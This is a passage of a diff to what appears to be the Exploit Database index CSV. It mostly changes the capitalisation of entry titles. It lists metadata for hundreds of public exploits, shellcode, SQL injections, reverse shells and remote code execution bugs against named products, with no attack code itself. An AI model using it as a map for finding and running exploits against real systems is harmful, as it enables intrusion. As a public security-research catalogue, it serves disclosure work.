- Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 @@ -35430,35 +35430,35 @@ id,file,description,date,author,platform,type,port 39182,platforms/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos,0 39183,platforms/windows/dos/39183.py,"ALLPlayer - '.wav' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 -39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 +39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - TCP Reverse Shell with Password Prompt Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 +39190,platforms/php/webapps/39190.php,"Wordpress cnhk-slideshow Plugin - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/php/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L - Arbitrary File Upload",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 -39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 +39197,platforms/php/webapps/39197.txt,"Wordpress Booking System (Booking Calendar) Plugin - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 39198,platforms/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 39373,platforms/osx/dos/39373.c,"OS X Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 -39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 -39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 +39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 +39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0 39206,platforms/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0 39207,platforms/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 39208,platforms/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 -39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 -39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 -39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39211,platforms/php/webapps/39211.txt,"Wordpress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 +39212,platforms/php/webapps/39212.txt,"Wordpress JW Player for Flash & HTML5 Video Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39213,platforms/php/webapps/39213.txt,"Wordpress Featured Comments Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 @@ -35478,24 +35478,24 @@ id,file,description,date,author,platform,type,port 39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 -39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery 1.9.1 Plugin - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 +39237,platforms/php/webapps/39237.txt,"Wordpress NextGEN Gallery 1.9.1 Plugin - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 -39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 +39240,platforms/php/webapps/39240.txt,"Wordpress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 -39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 -39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 -39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 +39250,platforms/php/webapps/39250.txt,"Wordpress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 +39251,platforms/php/webapps/39251.txt,"Wordpress BookX Plugin - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 +39252,platforms/php/webapps/39252.txt,"Wordpress WP Rss Poster Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39253,platforms/php/webapps/39253.txt,"Wordpress ENL Newsletter Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39254,platforms/php/webapps/39254.html,"Wordpress CopySafe PDF Protection Plugin - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 -39256,platforms/php/webapps/39256.txt,"Tera Charts - (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 -39257,platforms/php/webapps/39257.txt,"Tera Charts - (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 +39256,platforms/php/webapps/39256.txt,"Tera Charts - (tera-charts) Plugin for Wordpress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 +39257,platforms/php/webapps/39257.txt,"Tera Charts - (tera-charts) Plugin for Wordpress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 @@ -35503,13 +35503,13 @@ id,file,description,date,author,platform,type,port 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 -39371,platforms/osx/dos/39371.c,"OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 -39372,platforms/osx/dos/39372.c,"OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 +39371,platforms/osx/dos/39371.c,"OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 +39372,platforms/osx/dos/39372.c,"OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 -39269,platforms/php/webapps/39269.txt,"WordPress Lead Octopus Power Plugin - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 -39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress - options-general.php Option Manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 +39269,platforms/php/webapps/39269.txt,"Wordpress Lead Octopus Power Plugin - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 +39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for Wordpress - options-general.php Option Manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 @@ -35518,36 +35518,36 @@ id,file,description,date,author,platform,type,port 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 -39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 -39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39279,platforms/php/webapps/39279.txt,"Wordpress wpSS Plugin - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 +39280,platforms/php/webapps/39280.txt,"Wordpress HDW Player Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 -39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 -39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 +39282,platforms/php/webapps/39282.txt,"Wordpress GB Gallery Slideshow Plugin - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 +39283,platforms/php/webapps/39283.txt,"Wordpress FB Gorilla Plugin - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0 -39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 +39287,platforms/php/webapps/39287.txt,"Wordpress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 -39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 +39291,platforms/php/webapps/39291.txt,"Wordpress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute-force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 -39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 -39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 -39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39296,platforms/php/webapps/39296.txt,"Wordpress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39297,platforms/php/webapps/39297.txt,"Wordpress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39298,platforms/php/webapps/39298.txt,"Wordpress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39299,platforms/php/webapps/39299.txt,"Wordpress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39300,platforms/php/webapps/39300.txt,"Wordpress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 +39301,platforms/php/webapps/39301.html,"Wordpress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39302,platforms/php/webapps/39302.html,"Wordpress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39303,platforms/php/webapps/39303.txt,"Wordpress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39304,platforms/php/webapps/39304.txt,"Wordpress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 39306,platforms/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",php,webapps,443 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 -39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 +39309,platforms/php/webapps/39309.txt,"Wordpress Booking Calendar Contact Form Plugin 1.1.23 - Unauthenticated SQL Injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 @@ -35555,9 +35555,9 @@ id,file,description,date,author,platform,type,port 39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39315,platforms/hardware/dos/39315.pl,"Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 -39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 +39317,platforms/php/webapps/39317.txt,"Wordpress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 -39319,platforms/php/webapps/39319.txt,"WordPress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 +39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 @@ -35572,7 +35572,7 @@ id,file,description,date,author,platform,type,port 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 +39333,platforms/php/webapps/39333.html,"Wordpress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps,0 39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080 39336,platforms/linux/shellcode/39336.c,"Linux x86 & x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 @@ -35581,8 +35581,8 @@ id,file,description,date,author,platform,type,port 39338,platforms/linux/shellcode/39338.c,"Linux x86 & x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 -39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form 1.1.24 Plugin - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form 1.1.24 Plugin - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39341,platforms/php/webapps/39341.txt,"Wordpress Booking Calendar Contact Form 1.1.24 Plugin - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 +39342,platforms/php/webapps/39342.txt,"Wordpress Booking Calendar Contact Form 1.1.24 Plugin - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39343,platforms/php/webapps/39343.txt,"ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35596,8 +35596,8 @@ id,file,description,date,author,platform,type,port 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 -39357,platforms/osx/dos/39357.txt,"iOS/OS X - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 -39358,platforms/multiple/dos/39358.txt,"iOS/OS X - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39357,platforms/osx/dos/39357.txt,"iOS/OSX - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 +39358,platforms/multiple/dos/39358.txt,"iOS/OSX - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 39359,platforms/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39360,platforms/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39361,platforms/ios/dos/39361.txt,"iOS Kernel - 